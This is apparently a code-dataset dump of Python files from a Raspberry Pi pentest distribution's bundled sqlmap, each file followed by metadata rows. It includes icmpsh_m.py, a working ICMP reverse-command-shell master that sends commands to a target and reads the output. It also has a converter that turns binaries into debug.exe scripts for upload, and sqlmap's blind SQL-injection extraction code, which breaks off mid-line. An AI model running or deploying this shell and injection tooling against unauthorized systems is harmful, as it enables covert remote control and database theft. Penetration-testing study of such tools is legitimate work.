version='0.1') try: parser.add_option('-i', dest='inputFile', help='Input file') parser.add_option('-o', dest='outputFile', help='Output file') (args, _) = parser.parse_args() if not args.inputFile: parser.error('Missing the input file, -h for help') except (OptionError, TypeError), e: parser.error(e) if not os.path.isfile(args.inputFile): print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile sys.exit(1) f = open(args.inputFile, 'r') data = f.read() f.close() if not args.outputFile: args.outputFile = args.inputFile + '.bin' f = open(args.outputFile, 'wb') f.write(safechardecode(data)) f.close() if __name__ == '__main__': main()
4,106
Python
.py
96
35.572917
208
0.634214
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,936
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/icmpsh/__init__.py
#!/usr/bin/env python # # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in # Perl by Nico Leidecker <nico@leidecker.info>) # # Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com> # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. pass
872
Python
.py
21
40.47619
72
0.758824
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,937
icmpsh_m.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/icmpsh/icmpsh_m.py
#!/usr/bin/env python # # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in # Perl by Nico Leidecker <nico@leidecker.info>) # # Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com> # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os import select import socket import subprocess import sys def setNonBlocking(fd): """ Make a file descriptor non-blocking """ import fcntl flags = fcntl.fcntl(fd, fcntl.F_GETFL) flags = flags | os.O_NONBLOCK fcntl.fcntl(fd, fcntl.F_SETFL, flags) def main(src, dst): if subprocess.mswindows: sys.stderr.write('icmpsh master can only run on Posix systems\n') sys.exit(255) try: from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError: sys.stderr.write('You need to install Python Impacket library first\n') sys.exit(255) # Make standard input a non-blocking file stdin_fd = sys.stdin.fileno() setNonBlocking(stdin_fd) # Open one socket for ICMP protocol # A special option is set on the socket so that IP headers are included # with the returned data try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) except socket.error: sys.stderr.write('You need to run icmpsh master with administrator privileges\n') sys.exit(1) sock.setblocking(0) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Create a new IP packet and set its source and destination addresses ip = ImpactPacket.IP() ip.set_ip_src(src) ip.set_ip_dst(dst) # Create a new ICMP packet of type ECHO REPLY icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() while 1: cmd = '' # Wait for incoming replies if sock in select.select([ sock ], [], [])[0]: buff = sock.recv(4096) if 0 == len(buff): # Socket remotely closed sock.close() sys.exit(0) # Packet received; decode and display it ippacket = decoder.decode(buff) icmppacket = ippacket.child() # If the packet matches, report it to the user if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): # Get identifier and sequence number ident = icmppacket.get_icmp_id() seq_id = icmppacket.get_icmp_seq() data = icmppacket.get_data_as_string() if len(data) > 0: sys.stdout.write(data) # Parse command from standard input try: cmd = sys.stdin.readline() except: pass if cmd == 'exit\n': return # Set sequence number and identifier icmp.set_icmp_id(ident) icmp.set_icmp_seq(seq_id) # Include the command as data inside the ICMP packet icmp.contains(ImpactPacket.Data(cmd)) # Calculate its checksum icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 # Have the IP packet contain the ICMP packet (along with its payload) ip.contains(icmp) # Send it to the target host sock.sendto(ip.get_packet(), (dst, 0)) if __name__ == '__main__': if len(sys.argv) < 3: msg = 'missing mandatory options. Execute as root:\n' msg += './icmpsh-m.py <source IP address> <destination IP address>\n' sys.stderr.write(msg) sys.exit(1) main(sys.argv[1], sys.argv[2])
4,448
Python
.py
111
31.585586
113
0.624362
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,938
dbgtool.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/dbgtool/dbgtool.py
#!/usr/bin/env python """ dbgtool.py - Portable executable to ASCII debug script converter Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import sys import struct from optparse import OptionError from optparse import OptionParser def convert(inputFile): fileStat = os.stat(inputFile) fileSize = fileStat.st_size if fileSize > 65280: print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile sys.exit(1) script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) script += "%x\nf 0100 ffff 00\n" % fileSize scrString = "" counter = 256 counter2 = 0 fp = open(inputFile, "rb") fileContent = fp.read() for fileChar in fileContent: unsignedFileChar = struct.unpack("B", fileChar)[0] if unsignedFileChar != 0: counter2 += 1 if not scrString: scrString = "e %0x %02x" % (counter, unsignedFileChar) else: scrString += " %02x" % unsignedFileChar elif scrString: script += "%s\n" % scrString scrString = "" counter2 = 0 counter += 1 if counter2 == 20: script += "%s\n" % scrString scrString = "" counter2 = 0 script += "w\nq\n" return script def main(inputFile, outputFile): if not os.path.isfile(inputFile): print "ERROR: the provided input file '%s' is not a regular file" % inputFile sys.exit(1) script = convert(inputFile) if outputFile: fpOut = open(outputFile, "w") sys.stdout = fpOut sys.stdout.write(script) sys.stdout.close() else: print script if __name__ == "__main__": usage = "%s -i <input file> [-o <output file>]" % sys.argv[0] parser = OptionParser(usage=usage, version="0.1") try: parser.add_option("-i", dest="inputFile", help="Input binary file") parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") (args, _) = parser.parse_args() if not args.inputFile: parser.error("Missing the input file, -h for help") except (OptionError, TypeError), e: parser.error(e) inputFile = args.inputFile outputFile = args.outputFile main(inputFile, outputFile)
2,420
Python
.py
69
27.898551
88
0.614194
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,939
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/dbgtool/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,940
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/beep/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,941
beep.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/beep/beep.py
#!/usr/bin/env python """ beep.py - Make a beep sound Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import subprocess import sys import wave BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav") def beep(): try: if subprocess.mswindows: _win_wav_play(BEEP_WAV_FILENAME) elif sys.platform == "darwin": _mac_beep() elif sys.platform == "linux2": _linux_wav_play(BEEP_WAV_FILENAME) else: _speaker_beep() except: _speaker_beep() def _speaker_beep(): sys.stdout.write('\a') # doesn't work on modern Linux systems try: sys.stdout.flush() except IOError: pass def _mac_beep(): import Carbon.Snd Carbon.Snd.SysBeep(1) def _win_wav_play(filename): import winsound winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): import ctypes PA_STREAM_PLAYBACK = 1 PA_SAMPLE_S16LE = 3 BUFFSIZE = 1024 class struct_pa_sample_spec(ctypes.Structure): _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") wave_file = wave.open(filename, "rb") pa_sample_spec = struct_pa_sample_spec() pa_sample_spec.rate = wave_file.getframerate() pa_sample_spec.channels = wave_file.getnchannels() pa_sample_spec.format = PA_SAMPLE_S16LE error = ctypes.c_int(0) pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error)) if not pa_stream: raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) while True: latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) if latency == -1: raise Exception("Getting latency failed") buf = wave_file.readframes(BUFFSIZE) if not buf: break if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): raise Exception("Could not play file") wave_file.close() if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): raise Exception("Could not simple drain") pa.pa_simple_free(pa_stream) if __name__ == "__main__": beep()
2,427
Python
.py
67
30.134328
149
0.653961
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,942
update.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/mssqlsig/update.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import codecs import os import re import urllib2 import urlparse from xml.dom.minidom import Document # Path to the XML file with signatures MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") # Url to update Microsoft SQL Server XML versions file from MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" def updateMSSQLXML(): if not os.path.exists(MSSQL_XML): errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML print errMsg return infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL print infoMsg try: req = urllib2.Request(MSSQL_VERSIONS_URL) f = urllib2.urlopen(req) mssqlVersionsHtmlString = f.read() f.close() except urllib2.URLError: __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) __mssqlHostname = __mssqlPath[1] warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname warnMsg += " check your Internet connection and retry" print warnMsg return releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) releasesCount = len(releases) # Create the minidom document doc = Document() # Create the <root> base element root = doc.createElement("root") doc.appendChild(root) for index in xrange(0, releasesCount): release = releases[index] # Skip Microsoft SQL Server 6.5 because the HTML # table is in another format if release == "6.5": continue # Create the <signatures> base element signatures = doc.createElement("signatures") signatures.setAttribute("release", release) root.appendChild(signatures) startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) if index == releasesCount - 1: stopIdx = len(mssqlVersionsHtmlString) else: stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): servicePack = servicePack[1:] if "/" in servicePack: servicePack = servicePack[:servicePack.index("/")] if "(" in servicePack: servicePack = servicePack[:servicePack.index("(")] if "-" in servicePack: servicePack = servicePack[:servicePack.index("-")] if "*" in servicePack: servicePack = servicePack[:servicePack.index("*")] if servicePack.startswith("+"): servicePack = "0%s" % servicePack servicePack = servicePack.replace("\t", " ") servicePack = servicePack.replace("No SP", "0") servicePack = servicePack.replace("RTM", "0") servicePack = servicePack.replace("TM", "0") servicePack = servicePack.replace("SP", "") servicePack = servicePack.replace("Service Pack", "") servicePack = servicePack.replace("<a href=\"http:", "") servicePack = servicePack.replace(" ", " ") servicePack = servicePack.replace("+ ", "+") servicePack = servicePack.replace(" +", "+") if servicePack.endswith(" "): servicePack = servicePack[:-1] if servicePack and version: # Create the main <card> element signature = doc.createElement("signature") signatures.appendChild(signature) # Create a <version> element versionElement = doc.createElement("version") signature.appendChild(versionElement) # Give the <version> elemenet some text versionText = doc.createTextNode(version) versionElement.appendChild(versionText) # Create a <servicepack> element servicepackElement = doc.createElement("servicepack") signature.appendChild(servicepackElement) # Give the <servicepack> elemenet some text servicepackText = doc.createTextNode(servicePack) servicepackElement.appendChild(servicepackText) # Save our newly created XML to the signatures file mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") mssqlXml.close() infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML print infoMsg if __name__ == "__main__": updateMSSQLXML()
5,123
Python
.py
107
38.186916
160
0.630365
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,943
cloak.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/cloak/cloak.py
#!/usr/bin/env python """ cloak.py - Simple file encryption/compression utility Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import sys import zlib from optparse import OptionError from optparse import OptionParser def hideAscii(data): retVal = "" for i in xrange(len(data)): if ord(data[i]) < 128: retVal += chr(ord(data[i]) ^ 127) else: retVal += data[i] return retVal def cloak(inputFile): f = open(inputFile, 'rb') data = zlib.compress(f.read()) f.close() return hideAscii(data) def decloak(inputFile): f = open(inputFile, 'rb') try: data = zlib.decompress(hideAscii(f.read())) except: print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile sys.exit(1) finally: f.close() return data def main(): usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0] parser = OptionParser(usage=usage, version='0.1') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') parser.add_option('-i', dest='inputFile', help='Input file') parser.add_option('-o', dest='outputFile', help='Output file') (args, _) = parser.parse_args() if not args.inputFile: parser.error('Missing the input file, -h for help') except (OptionError, TypeError), e: parser.error(e) if not os.path.isfile(args.inputFile): print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile sys.exit(1) if not args.decrypt: data = cloak(args.inputFile) else: data = decloak(args.inputFile) if not args.outputFile: if not args.decrypt: args.outputFile = args.inputFile + '_' else: args.outputFile = args.inputFile[:-1] f = open(args.outputFile, 'wb') f.write(data) f.close() if __name__ == '__main__': main()
2,061
Python
.py
63
26.634921
104
0.624368
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,944
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/cloak/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,945
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,946
redirecthandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/redirecthandler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib2 import urlparse from StringIO import StringIO from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.common import getHostHeader from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import readInput from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): retVal = None if headers: if "location" in headers: retVal = headers.getheaders("location")[0].split("?")[0] elif "uri" in headers: retVal = headers.getheaders("uri")[0].split("?")[0] return retVal def _ask_redirect_choice(self, redcode, redurl, method): with kb.locks.redirect: if kb.redirectChoice is None: msg = "sqlmap got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? [Y/n] " % redurl choice = readInput(msg, default="Y") kb.redirectChoice = choice.upper() if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) kb.resendPostOnRedirect = choice.upper() == 'Y' if kb.resendPostOnRedirect: self.redirect_request = self._redirect_request def _redirect_request(self, req, fp, code, msg, headers, newurl): newurl = newurl.replace(' ', '%20') return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) def http_error_302(self, req, fp, code, msg, headers): content = None redurl = self._get_header_redirect(headers) try: content = fp.read(MAX_CONNECTION_TOTAL_SIZE) except Exception, msg: dbgMsg = "there was a problem while retrieving " dbgMsg += "redirect response content (%s)" % msg logger.debug(dbgMsg) finally: if content: try: # try to write it back to the read buffer so we could reuse it in further steps fp.fp._rbuf.truncate(0) fp.fp._rbuf.write(content) except: pass content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) threadData = getCurrentThreadData() threadData.lastRedirectMsg = (threadData.lastRequestUID, content) redirectMsg = "HTTP redirect " redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) if headers: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items()) else: logHeaders = "" redirectMsg += logHeaders if content: redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE]) logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) if redurl: try: if not urlparse.urlsplit(redurl).netloc: redurl = urlparse.urljoin(req.get_full_url(), redurl) self._infinite_loop_check(req) self._ask_redirect_choice(code, redurl, req.get_method()) except ValueError: redurl = None result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except: redurl = None result = fp fp.read = StringIO("").read else: result = fp threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) result.redcode = code result.redurl = redurl return result http_error_301 = http_error_303 = http_error_307 = http_error_302 def _infinite_loop_check(self, req): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) errMsg += "Please check all provided parameters and/or provide missing ones" raise SqlmapConnectionException(errMsg)
5,911
Python
.py
116
40.853448
175
0.641581
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,947
templates.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/templates.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.data import kb from lib.request.connect import Connect as Request def getPageTemplate(payload, place): retVal = (kb.originalPage, kb.errorIsNone) if payload and place: if (payload, place) not in kb.pageTemplates: page, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] return retVal
634
Python
.py
15
37.333333
85
0.715686
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,948
methodrequest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/methodrequest.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib2 class MethodRequest(urllib2.Request): ''' Used to create HEAD/PUT/DELETE/... requests with urllib2 ''' def set_method(self, method): self.method = method.upper() def get_method(self): return getattr(self, 'method', urllib2.Request.get_method(self))
449
Python
.py
14
28.071429
72
0.699301
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,949
inject.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/inject.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import cleanQuery from lib.core.common import expandAsteriskForColumns from lib.core.common import extractExpectedValue from lib.core.common import getPublicTypeMembers from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import initTechnique from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parseUnionPage from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import SQL_SCALAR_REGEX from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.direct import direct from lib.techniques.blind.inference import bisection from lib.techniques.blind.inference import queryOutputLength from lib.techniques.dns.test import dnsTest from lib.techniques.dns.use import dnsUse from lib.techniques.error.use import errorUse from lib.techniques.union.use import unionUse def _goDns(payload, expression): value = None if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) if kb.dnsTest: value = dnsUse(payload, expression) return value def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): start = time.time() value = None count = 0 value = _goDns(payload, expression) if value is not None: return value timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression)) if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','): nulledCastedField = agent.nullAndCastField(field) injExpression = expression.replace(field, nulledCastedField, 1) else: injExpression = expression length = queryOutputLength(injExpression, payload) else: length = None kb.inferenceMode = True count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) kb.inferenceMode = False if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) return value def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): outputs = [] origExpr = None for field in expressionFieldsList: output = None if field.startswith("ROWNUM "): continue if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) if isinstance(num, int): expression = origExpr outputs.append(output) return outputs def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Retrieve the output of a SQL query characted by character taking advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ initTechnique(kb.technique) query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None startLimit = 0 stopLimit = None outputs = BigArray() if not unpack: return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: infoMsg = "the SQL query provided has more than one field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" logger.info(infoMsg) # If we have been here from SQL query/shell we have to check if # the SQL query might return multiple entries and in such case # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True if not stopLimit or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False if test: # Count the number of SQL query entries output countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) if " ORDER BY " in expression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] if not stopLimit: count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) if isNumPosStrValue(count): count = int(count) if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " message += "%d entries. How many " % count message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" test = readInput(message, default="a") if not test or test[0] in ("a", "A"): stopLimit = count elif test[0] in ("q", "Q"): raise SqlmapUserQuitException elif test.isdigit() and int(test) > 0 and int(test) <= count: stopLimit = int(test) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) elif test[0] in ("#", "s", "S"): message = "how many? " stopLimit = readInput(message, default="10") if not stopLimit.isdigit(): errMsg = "invalid choice" logger.error(errMsg) return None else: stopLimit = int(stopLimit) else: errMsg = "invalid choice" logger.error(errMsg) return None elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) return None elif (not stopLimit or stopLimit == 0): return None try: for num in xrange(startLimit, stopLimit): output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs.append(output) except KeyboardInterrupt: print warnMsg = "user aborted during dumping phase" logger.warn(warnMsg) return outputs elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in 